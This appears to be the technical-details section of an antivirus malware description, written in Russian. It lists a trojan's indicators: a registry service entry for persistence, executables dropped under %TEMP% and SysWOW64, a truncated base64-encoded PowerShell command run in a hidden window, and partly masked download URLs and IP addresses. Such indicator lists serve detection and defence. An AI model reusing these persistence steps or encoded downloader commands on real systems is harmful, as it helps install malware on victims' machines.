Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\NlsData002a] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\NlsData002a] 'ImagePath' = '"%WINDIR%\SysWOW64\at\NlsData002a.exe"'
- 'NlsData002a' "%WINDIR%\SysWOW64\at\NlsData002a.exe"
- 'NlsData002a' %WINDIR%\SysWOW64\at\NlsData002a.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGADcANAB5AGMAcgA3AD0AKAAnAEQAJwArACgAJwBrACcAKwAnAGgAbgAxACcAKQArACcAMgB1ACcAKQA7ACYAKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdABlAE0AUABcAFcATwByAEQAXAAyADAAMQA5AF...
- %TEMP%\word\2019\d11ong43.exe
- %WINDIR%\syswow64\at\nlsdata002a.exe
- %TEMP%\word\2019\d11ong43.exe в %WINDIR%\syswow64\at\nlsdata002a.exe
- '19#.#36.179.102':80
- http://ma##ue.es/stat/HWDzR/
- http://19#.#36.179.102/wBWKydVImbphHfjHx/5JymR4y8d7DR/8oMJUmcVnK/5MX3zFUA1/emph9FjIpehrXHz/cX2BFCKge1lA/
- DNS ASK ma##ue.es
- '%TEMP%\word\2019\d11ong43.exe'
- '%WINDIR%\syswow64\at\nlsdata002a.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGADcANAB5AGMAcgA3AD0AKAAnAEQAJwArACgAJwBrACcAKwAnAGgAbgAxACcAKQArACcAMgB1ACcAKQA7ACYAKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdABlAE0AUABcAFcATwByAEQAXAAyADAAMQA5AF...' (со скрытым окном)